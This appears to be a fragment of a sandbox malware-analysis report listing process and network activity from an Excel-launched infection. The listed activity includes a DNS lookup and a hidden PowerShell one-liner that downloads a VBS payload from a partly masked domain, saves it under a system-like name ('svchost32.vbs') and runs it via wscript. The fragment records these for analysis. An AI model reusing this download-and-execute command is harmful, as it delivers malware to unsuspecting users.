Technical Information
- http://on###ivenet.xyz/work/33.vbs as c:\users\public\svchost32.vbs
- DNS ASK on###ivenet.xyz
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (New-Object System.Net.WebClient).DownloadFile('http://on###ivenet.xyz/work/33.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\svchost32.vbs"